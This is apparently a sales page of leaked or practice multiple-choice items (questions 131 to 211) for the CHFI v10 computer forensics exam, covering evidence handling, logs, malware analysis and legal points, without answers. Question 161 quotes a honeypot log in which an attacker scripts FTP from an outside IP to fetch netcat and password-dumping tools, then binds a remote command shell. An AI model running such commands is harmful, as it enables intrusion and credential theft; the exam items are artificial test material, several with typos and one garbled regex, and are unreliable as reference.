What should you do when approached by a reporter about a case that you are working on or have worked on?

Options:

A.

Refer the reporter to the attorney that retained you

B.

Say, "no comment"

C.

Answer all the reporter’s questions as completely as possible

D.

Answer only the questions that help your case

Buy Now
Questions 131

You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended-up in court. What argument could the defense make to weaken your case?

Options:

A.

The tool hasn't been tested by the International Standards Organization (ISO)

B.

Only the local law enforcement should use the tool

C.

The total has not been reviewed and accepted by your peers

D.

You are not certified for using the tool

Buy Now
Questions 132

When an investigator contacts by telephone the domain administrator or controller listed by a Who is lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?

Options:

A.

Title 18, Section 1030

B.

Title 18, Section 2703(d)

C.

Title 18, Section Chapter 90

D.

Title 18, Section 2703(f)

Buy Now
Questions 133

Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?

Options:

A.

Only an HTTPS session can be hijacked

B.

HTTP protocol does not maintain session

C.

Only FTP traffic can be hijacked

D.

Only DNS traffic can be hijacked

Buy Now
Questions 134

To preserve digital evidence, an investigator should ____________________.

Options:

A.

Make two copies of each evidence item using a single imaging tool

B.

Make a single copy of each evidence item using an approved imaging tool

C.

Make two copies of each evidence item using different imaging tools

D.

Only store the original evidence item

Buy Now
Questions 135

You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a “simple backup copy” of the hard drive in the PC and put it on this drive and requests that you examine that drive for evidence of the suspected images. You inform him that a “simple backup copy” will not provide deleted files or recover file fragments.

What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?

Options:

A.

Bit-stream Copy

B.

Robust Copy

C.

Full backup Copy

D.

Incremental Backup Copy

Buy Now
Questions 136

You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data.

What method would be most efficient for you to acquire digital evidence from this network?

Options:

A.

create a compressed copy of the file with DoubleSpace

B.

create a sparse data copy of a folder or file

C.

make a bit-stream disk-to-image file

D.

make a bit-stream disk-to-disk file

Buy Now
Questions 137

Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file?

Options:

A.

Sector

B.

Metadata

C.

MFT

D.

Slack Space

Buy Now
Questions 138

Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his production network. In this honeypot, he has placed a server running Windows Active Directory. He has also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to download sensitive information by clicking on a button. A week later, Jason finds in his network logs how an intruder accessed the honeypot and downloaded sensitive information. Jason uses the logs to try and prosecute the intruder for stealing sensitive corporate information. Why will this not be viable?

Options:

A.

Entrapment

B.

Enticement

C.

Intruding into a honeypot is not illegal

D.

Intruding into a DMZ is not illegal

Buy Now
Questions 139

In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?

Options:

A.

one who has NTFS 4 or 5 partitions

B.

one who uses dynamic swap file capability

C.

one who uses hard disk writes on IRQ 13 and 21

D.

one who has lots of allocation units per block or cluster

Buy Now
Questions 140

The following excerpt is taken from a honeypot log. The log captures activities across three days.

There are several intrusion attempts; however, a few are successful.

(Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.)

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169

Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482

Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53

Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21

Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53

Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53

Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53

Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111

Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80

Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53

Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)

Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)

Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080

Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

From the options given below choose the one which best interprets the following entry:

Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

Options:

A.

An IDS evasion technique

B.

A buffer overflow attempt

C.

A DNS zone transfer

D.

Data being retrieved from 63.226.81.13

Buy Now
Questions 141

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?

Options:

A.

Tracert

B.

Smurf scan

C.

Ping trace

D.

ICMP ping sweep

Buy Now
Questions 142

On Linux/Unix based Web servers, what privilege should the daemon service be run under?

Options:

A.

Guest

B.

Root

C.

You cannot determine what privilege runs the daemon service

D.

Something other than root

Buy Now
Questions 143

George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as "stealthy" as possible during the scan. Why would a scanner like Nessus is not recommended in this situation?

Options:

A.

Nessus is too loud

B.

Nessus cannot perform wireless testing

C.

Nessus is not a network scanner

D.

There are no ways of performing a "stealthy" wireless scan

Buy Now
Questions 144

What happens when a file is deleted by a Microsoft operating system using the FAT file system?

Options:

A.

only the reference to the file is removed from the FAT

B.

the file is erased and cannot be recovered

C.

a copy of the file is stored and the original file is erased

D.

the file is erased but can be recovered

Buy Now
Questions 145

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?

Options:

A.

8

B.

1

C.

4

D.

2

Buy Now
Questions 146

Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test.

The second utility executes five known exploits against his network in which the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis?

Options:

A.

False negatives

B.

False positives

C.

True negatives

D.

True positives

Buy Now
Questions 147

When you carve an image, recovering the image depends on which of the following skills?

Options:

A.

Recognizing the pattern of the header content

B.

Recovering the image from a tape backup

C.

Recognizing the pattern of a corrupt file

D.

Recovering the image from the tape backup

Buy Now
Questions 148

You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see if you remember your ECSA class. He asks about the methodology you will be using to test the company's network. How would you answer?

Options:

A.

Microsoft Methodology

B.

Google Methodology

C.

IBM Methodology

D.

LPT Methodology

Buy Now
Questions 149

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

Options:

A.

Linux/Unix computers are easier to compromise

B.

Linux/Unix computers are constantly talking

C.

Windows computers are constantly talking

D.

Windows computers will not respond to idle scans

Buy Now
Questions 150

When cataloging digital evidence, the primary goal is to

Options:

A.

Make bit-stream images of all hard drives

B.

Preserve evidence integrity

C.

Not remove the evidence from the scene

D.

Not allow the computer to be turned off

Buy Now
Questions 151

____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.

Options:

A.

Network Forensics

B.

Computer Forensics

C.

Incident Response

D.

Event Reaction

Buy Now
Questions 152

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question whether evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?

Options:

A.

make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

B.

make an MD5 hash of the evidence and compare it to the standard database developed by NIST

C.

there is no reason to worry about this possible claim because state labs are certified

D.

sign a statement attesting that the evidence is the same as it was when it entered the lab

Buy Now
Questions 153

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years.

You navigate to archive. org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: What have you found?

Options:

A.

Web bug

B.

CGI code

C.

Trojan.downloader

D.

Blind bug

Buy Now
Questions 154

What does mactime, an essential part of the coroner's toolkit do?

Options:

A.

It traverses the file system and produces a listing of all files based on the modification, access and change timestamps

B.

It can recover deleted file space and search it for data. However, it does not allow the investigator to preview them

C.

The tools scans for i-node information, which is used by other tools in the tool kit

D.

It is too specific to the MAC OS and forms a core component of the toolkit

Buy Now
Questions 155

What is kept in the following directory? HKLM\SECURITY\Policy\Secrets

Options:

A.

Cached password hashes for the past 20 users

B.

Service account passwords in plain text

C.

IAS account names and passwords

D.

Local store PKI Kerberos certificates

Buy Now
Questions 156

Paul's company is in the process of undergoing a complete security audit including logical and physical security testing. After all logical tests were performed; it is now time for the physical round to begin. None of the employees are made aware of this round of testing. The security-auditing firm sends in a technician dressed as an electrician. He waits outside in the lobby for some employees to get to work and follows behind them when they access the restricted areas. After entering the main office, he is able to get into the server room telling the IT manager that there is a problem with the outlets in that room. What type of attack has the technician performed?

Options:

A.

Tailgating

B.

Backtrapping

C.

Man trap attack

D.

Fuzzing

Buy Now
Questions 157

You should make at least how many bit-stream copies of a suspect drive?

Options:

A.

1

B.

2

C.

3

D.

4

Buy Now
Questions 158

Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a small accounting firm in Florid a. They have given her permission to perform social engineering attacks on the company to see if their in-house training did any good. Julia calls the main number for the accounting firm and talks to the receptionist. Julia says that she is an IT technician from the company's main office in Iowa. She states that she needs the receptionist's network username and password to troubleshoot a problem they are having. Julia says that Bill Hammond, the CEO of the company, requested this information. After hearing the name of the CEO, the receptionist gave Julia all the information she asked for. What principal of social engineering did Julia use?

Options:

A.

Social Validation

B.

Scarcity

C.

Friendship/Liking

D.

Reciprocation

Buy Now
Questions 159

What is a good security method to prevent unauthorized users from "tailgating"?

Options:

A.

Man trap

B.

Electronic combination locks

C.

Pick-resistant locks

D.

Electronic key systems

Buy Now
Questions 160

You are working as a Computer forensics investigator for a corporation on a computer abuse case. You discover evidence that shows the subject of your investigation is also embezzling money from the company. The company CEO and the corporate legal counsel advise you to contact law enforcement and provide them with the evidence that you have found. The law enforcement officer that responds requests that you put a network sniffer on your network and monitor all traffic to the subject’s computer. You inform the officer that you will not be able to comply with that request because doing so would:

Options:

A.

Violate your contract

B.

Cause network congestion

C.

Make you an agent of law enforcement

D.

Write information to the subject’s hard drive

Buy Now
Questions 161

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Short reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

Options:

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system - johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Buy Now
Questions 162

In Linux, what is the smallest possible shellcode?

Options:

A.

24 bytes

B.

8 bytes

C.

800 bytes

D.

80 bytes

Buy Now
Questions 163

When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk?

Options:

A.

a write-blocker

B.

a protocol analyzer

C.

a firewall

D.

a disk editor

Buy Now
Questions 164

Why should you note all cable connections for a computer you want to seize as evidence?

Options:

A.

to know what outside connections existed

B.

in case other devices were connected

C.

to know what peripheral devices exist

D.

to know what hardware existed

Buy Now
Questions 165

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

Options:

A.

evidence must be handled in the same way regardless of the type of case

B.

evidence procedures are not important unless you work for a law enforcement agency

C.

evidence in a criminal case must be secured more tightly than in a civil case

D.

evidence in a civil case must be secured more tightly than in a criminal case

Buy Now
Questions 166

Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately.

Which organization coordinates computer crimes investigations throughout the United States?

Options:

A.

Internet Fraud Complaint Center

B.

Local or national office of the U.S. Secret Service

C.

National Infrastructure Protection Center

D.

CERT Coordination Center

Buy Now
Questions 167

When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:

Options:

A.

Recycle Bin

B.

MSDOS.sys

C.

BIOS

D.

Case files

Buy Now
Questions 168

Which of the following directory contains the binary files or executables required for system maintenance and administrative tasks on a Linux system?

Options:

A.

/sbin

B.

/bin

C.

/usr

D.

/lib

Buy Now
Questions 169

Mark works for a government agency as a cyber-forensic investigator. He has been given the task of restoring data from a hard drive. The partition of the hard drive was deleted by a disgruntled employee In order to hide their nefarious actions. What tool should Mark use to restore the data?

Options:

A.

EFSDump

B.

Diskmon D

C.

iskvlew

D.

R-Studio

Buy Now
Questions 170

The working of the Tor browser is based on which of the following concepts?

Options:

A.

Both static and default routing

B.

Default routing

C.

Static routing

D.

Onion routing

Buy Now
Questions 171

Which set of anti-forensic tools/techniques allows a program to compress and/or encrypt an executable file to hide attack tools from being detected by reverse-engineering or scanning?

Options:

A.

Packers

B.

Emulators

C.

Password crackers

D.

Botnets

Buy Now
Questions 172

Debbie has obtained a warrant to search a known pedophiles house. Debbie went to the house and executed the search warrant to seize digital devices that have been recorded as being used for downloading Illicit Images. She seized all digital devices except a digital camera. Why did she not collect the digital camera?

Options:

A.

The digital camera was not listed as one of the digital devices in the warrant

B.

The vehicle Debbie was using to transport the evidence was already full and could not carry more items

C.

Debbie overlooked the digital camera because it is not a computer system

D.

The digital camera was old. had a cracked screen, and did not have batteries. Therefore, it could not have been used in a crime.

Buy Now
Questions 173

______allows a forensic investigator to identify the missing links during investigation.

Options:

A.

Evidence preservation

B.

Chain of custody

C.

Evidence reconstruction

D.

Exhibit numbering

Buy Now
Questions 174

A clothing company has recently deployed a website on Its latest product line to Increase Its conversion rate and base of customers. Andrew, the network administrator recently appointed by the company, has been assigned with the task of protecting the website from Intrusion and vulnerabilities. Which of the following tool should Andrew consider deploying in this scenario?

Options:

A.

ModSecurity

B.

CryptaPix

C.

Recuva

D.

Kon-Boot

Buy Now
Questions 175

Which of the following methods of mobile device data acquisition captures all the data present on the device, as well as all deleted data and access to unallocated space?

Options:

A.

Manual acquisition

B.

Logical acquisition

C.

Direct acquisition

D.

Physical acquisition

Buy Now
Questions 176

Maria has executed a suspicious executable file In a controlled environment and wants to see if the file adds/modifies any registry value after execution via Windows Event Viewer. Which of the following event ID should she look for In this scenario?

Options:

A.

Event ID 4657

B.

Event ID 4624

C.

Event ID 4688

D.

Event ID 7040

Buy Now
Questions 177

A breach resulted from a malware attack that evaded detection and compromised the machine memory without installing any software or accessing the hard drive. What technique did the adversaries use to deliver the attack?

Options:

A.

Fileless

B.

Trojan

C.

JavaScript

D.

Spyware

Buy Now
Questions 178

You are a forensic investigator who is analyzing a hard drive that was recently collected as evidence. You have been unsuccessful at locating any meaningful evidence within the file system and suspect a drive wiping utility may have been used. You have reviewed the keys within the software hive of the Windows registry and did not find any drive wiping utilities. How can you verify that drive wiping software was used on the hard drive?

Options:

A.

Document in your report that you suspect a drive wiping utility was used, but no evidence was found

B.

Check the list of installed programs

C.

Load various drive wiping utilities offline, and export previous run reports

D.

Look for distinct repeating patterns on the hard drive at the bit level

Buy Now
Questions 179

Which of the following malware targets Android mobile devices and installs a backdoor that remotely installs applications from an attacker-controlled server?

Options:

A.

Felix

B.

XcodeGhost

C.

xHelper

D.

Unflod

Buy Now
Questions 180

You are an information security analyst at a large pharmaceutical company. While performing a routine review of audit logs, you have noticed a significant amount of egress traffic to various IP addresses on destination port 22 during off-peak hours. You researched some of the IP addresses and found that many of them are in Eastern Europe. What is the most likely cause of this traffic?

Options:

A.

Malicious software on internal system is downloading research data from partner 5FTP servers in Eastern Europe

B.

Internal systems are downloading automatic Windows updates

C.

Data is being exfiltrated by an advanced persistent threat (APT)

D.

The organization's primary internal DNS server has been compromised and is performing DNS zone transfers to malicious external entities

Buy Now
Questions 181

An investigator needs to perform data acquisition from a storage media without altering its contents to maintain the Integrity of the content. The approach adopted by the Investigator relies upon the capacity of enabling read-only access to the storage media. Which tool should the Investigator Integrate Into his/her procedures to accomplish this task?

Options:

A.

BitLocker

B.

Data duplication tool

C.

Backup tool

D.

Write blocker

Buy Now
Questions 182

Simona has written a regular expression for the detection of web application-specific attack attempt that reads as /((\%3C)|)/lx. Which of the following does the part (|\%3E)|>) look for?

Options:

A.

Alphanumeric string or its hex equivalent

B.

Opening angle bracket or its hex equivalent

C.

Closing angle bracket or its hex equivalent

D.

Forward slash for a closing tag or its hex equivalent

Buy Now
Questions 183

Consider a scenario where the perpetrator of a dark web crime has unlnstalled Tor browser from their computer after committing the crime. The computer has been seized by law enforcement so they can Investigate It for artifacts of Tor browser usage. Which of the following should the Investigators examine to establish the use of Tor browser on the suspect machine?

Options:

A.

Swap files

B.

Files in Recycle Bin

C.

Security logs

D.

Prefetch files

Buy Now
Questions 184

To understand the impact of a malicious program after the booting process and to collect recent information from the disk partition, an Investigator should evaluate the content of the:

Options:

A.

MBR

B.

GRUB

C.

UEFI

D.

BIOS

Buy Now
Questions 185

Which of the following tools will allow a forensic Investigator to acquire the memory dump of a suspect machine so that It may be Investigated on a forensic workstation to collect evidentiary data like processes and Tor browser artifacts?

Options:

A.

DB Browser SQLite

B.

Bulk Extractor

C.

Belkasoft Live RAM Capturer and AccessData FTK imager

D.

Hex Editor

Buy Now
Questions 186

Which among the following acts has been passed by the U.S. Congress to protect investors from the possibility of fraudulent accounting activities by corporations?

Options:

A.

Federal Information Security Management act of 2002

B.

Gramm-Leach-Bliley act

C.

Health insurance Probability and Accountability act of 1996

D.

Sarbanes-Oxley act of 2002

Buy Now
Questions 187

A forensic analyst has been tasked with investigating unusual network activity Inside a retail company's network. Employees complain of not being able to access services, frequent rebooting, and anomalies In log files. The Investigator requested log files from the IT administrator and after carefully reviewing them, he finds the following log entry:

What type of attack was performed on the companies' web application?

Options:

A.

Directory transversal

B.

Unvalidated input

C.

Log tampering

D.

SQL injection

Buy Now
Questions 188

William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?

Options:

A.

The combined log format of Apache access log

B.

The common log format of Apache access log

C.

Apache error log

D.

IIS log

Buy Now
Questions 189

Robert needs to copy an OS disk snapshot of a compromised VM to a storage account in different region for further investigation. Which of the following should he use in this scenario?

Options:

A.

Azure CLI

B.

Azure Monitor

C.

Azure Active Directory

D.

Azure Portal

Buy Now
Questions 190

Harry has collected a suspicious executable file from an infected system and seeks to reverse its machine code to Instructions written in assembly language. Which tool should he use for this purpose?

Options:

A.

Ollydbg

B.

oledump

C.

HashCalc

D.

BinText

Buy Now
Questions 191

Steve received a mail that seemed to have come from her bank. The mail has instructions for Steve to click on a link and provide information to avoid the suspension of her account. The link in the mail redirected her to a form asking for details such as name, phone number, date of birth, credit card number or PIN, CW code, SNNs, and email address. On a closer look, Steve realized that the URL of the form in not the same as that of her bank's. Identify the type of external attack performed by the attacker In the above scenario?

Options:

A.

Aphishing

B.

Espionage

C.

Taiigating

D.

Brute-force

Buy Now
Questions 192

Cloud forensic investigations impose challenges related to multi-jurisdiction and multi-tenancy aspects. To have a better understanding of the roles and responsibilities between the cloud service provider (CSP) and the client, which document should the forensic investigator review?

Options:

A.

Service level agreement

B.

Service level management

C.

National and local regulation

D.

Key performance indicator

Buy Now
Questions 193

What happens lo the header of the file once It Is deleted from the Windows OS file systems?

Options:

A.

The OS replaces the first letter of a deleted file name with a hex byte code: E5h

B.

The OS replaces the entire hex byte coding of the file.

C.

The hex byte coding of the file remains the same, but the file location differs

D.

The OS replaces the second letter of a deleted file name with a hex byte code: Eh5

Buy Now
Questions 194

Which of the following Windows event logs record events related to device drives and hardware changes?

Options:

A.

Forwarded events log

B.

System log

C.

Application log

D.

Security log

Buy Now
Questions 195

An EC2 instance storing critical data of a company got infected with malware. The forensics team took the EBS volume snapshot of the affected Instance to perform further analysis and collected other data of evidentiary value. What should be their next step?

Options:

A.

They should pause the running instance

B.

They should keep the instance running as it stores critical data

C.

They should terminate all instances connected via the same VPC

D.

They should terminate the instance after taking necessary backup

Buy Now
Questions 196

Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads It to VirusTotal in order to confirm whether the file Is malicious, provide information about Its functionality, and provide Information that will allow to produce simple network signatures. What type of malware analysis was performed here?

Options:

A.

Static

B.

Volatile

C.

Dynamic

D.

Hybrid

Buy Now
Questions 197

An Investigator Is checking a Cisco firewall log that reads as follows:

Aug 21 2019 09:16:44: %ASA-1-106021: Deny ICMP reverse path check from 10.0.0.44 to 10.0.0.33 on Interface outside

What does %ASA-1-106021 denote?

Options:

A.

Mnemonic message

B.

Type of traffic

C.

Firewall action

D.

Type of request

Buy Now
Questions 198

Which of the following tools is used to dump the memory of a running process, either immediately or when an error condition occurs?

Options:

A.

FATKit

B.

Coreography

C.

Belkasoft Live RAM Capturer

D.

Cachelnf

Buy Now
Questions 199

In forensics.______are used lo view stored or deleted data from both files and disk sectors.

Options:

A.

Hash algorithms

B.

SI EM tools

C.

Host interfaces

D.

Hex editors

Buy Now
Questions 200

To which phase of the computer forensics investigation process does "planning and budgeting of a forensics lab" belong?

Options:

A.

Post-investigation phase

B.

Reporting phase

C.

Pre-investigation phase

D.

Investigation phase

Buy Now
Questions 201

Which of the following applications will allow a forensic investigator to track the user login sessions and user transactions that have occurred on an MS SQL Server?

Options:

A.

ApexSQL Audit

B.

netcat

C.

Notepad++

D.

Event Log Explorer

Buy Now
Questions 202

Which of the following is a requirement for senders as per the CAN-SPAM act?

Options:

A.

Senders cannot use misleading or false header information

B.

Senders should never share their physical postal address in the email

C.

Senders must use deceptive subject lines

D.

Emails must not contain information regarding how to stop receiving emails from the sender in future

Buy Now
Questions 203

"In exceptional circumstances, where a person finds it necessary to access original data held on a computer or on storage media, that person must be competent to do so and be able to explain his/her actions and the impact of those actions on the evidence, in the court." Which ACPO principle states this?

Options:

A.

Principle 1

B.

Principle 3

C.

Principle 4

D.

Principle 2

Buy Now
Questions 204

On NTFS file system, which of the following tools can a forensic Investigator use In order to identify timestomping of evidence files?

Options:

A.

wbStego

B.

Exiv2

C.

analyzeMFT

D.

Timestomp

Buy Now
Questions 205

During an Investigation. Noel found a SIM card from the suspect's mobile. The ICCID on the card is

8944245252001451548.

What does the first four digits (89 and 44) In the ICCID represent?

Options:

A.

TAC and industry identifier

B.

Country code and industry identifier

C.

Industry identifier and country code

D.

Issuer identifier number and TAC

Buy Now
Questions 206

Edgar is part of the FBI's forensic media and malware analysis team; he Is analyzing a current malware and Is conducting a thorough examination of the suspect system, network, and other connected devices. Edgar's approach Is to execute the malware code to know how It Interacts with the host system and Its Impacts on It. He is also using a virtual machine and a sandbox environment.

What type of malware analysis is Edgar performing?

Options:

A.

Malware disassembly

B.

VirusTotal analysis

C.

Static analysis

D.

Dynamic malware analysis/behavioral analysis

Buy Now
Questions 207

In Java, when multiple applications are launched, multiple Dalvik Virtual Machine instances occur that consume memory and time. To avoid that. Android Implements a process that enables low memory consumption and quick start-up time. What is the process called?

Options:

A.

init

B.

Media server

C.

Zygote

D.

Daemon

Buy Now
Questions 208

In which loT attack does the attacker use multiple forged identities to create a strong illusion of traffic congestion, affecting communication between neighboring nodes and networks?

Options:

A.

Replay attack

B.

Jamming attack

C.

Blueborne attack

D.

Sybil attack

Buy Now
Questions 209

Which of the following Ii considered as the starting point of a database and stores user data and database objects in an MS SQL server?

Options:

A.

Ibdata1

B.

Application data files (ADF)

C.

Transaction log data files (LDF)

D.

Primary data files (MDF)

Buy Now
Questions 210

Fred, a cybercrime Investigator for the FBI, finished storing a solid-state drive In a static resistant bag and filled out the chain of custody form. Two days later. John grabbed the solid-state drive and created a clone of It (with write blockers enabled) In order to Investigate the drive. He did not document the chain of custody though. When John was finished, he put the solid-state drive back in the static resistant and placed it back in the evidence locker. A day later, the court trial began and upon presenting the evidence and the supporting documents, the chief Justice outright rejected them. Which of the following statements strongly support the reason for rejecting the evidence?

Options:

A.

Block clones cannot be created with solid-state drives

B.

Write blockers were used while cloning the evidence

C.

John did not document the chain of custody

D.

John investigated the clone instead of the original evidence itself

Buy Now
Questions 211

Williamson is a forensic investigator. While investigating a case of data breach at a company, he is maintaining a document that records details such as the forensic processes applied on the collected evidence, particulars of people handling It. the dates and times when it Is being handled, and the place of storage of the evidence. What do you call this document?

Options:

A.

Consent form

B.

Log book

C.

Authorization form

D.

Chain of custody

Buy Now
Exam Code: 312-49v10
Exam Name: Computer Hacking Forensic Investigator (CHFI-v10)
Last Update: Nov 23, 2024
Questions: 704
$57.75  $164.99
$43.75  $124.99
$36.75  $104.99
buy now 312-49v10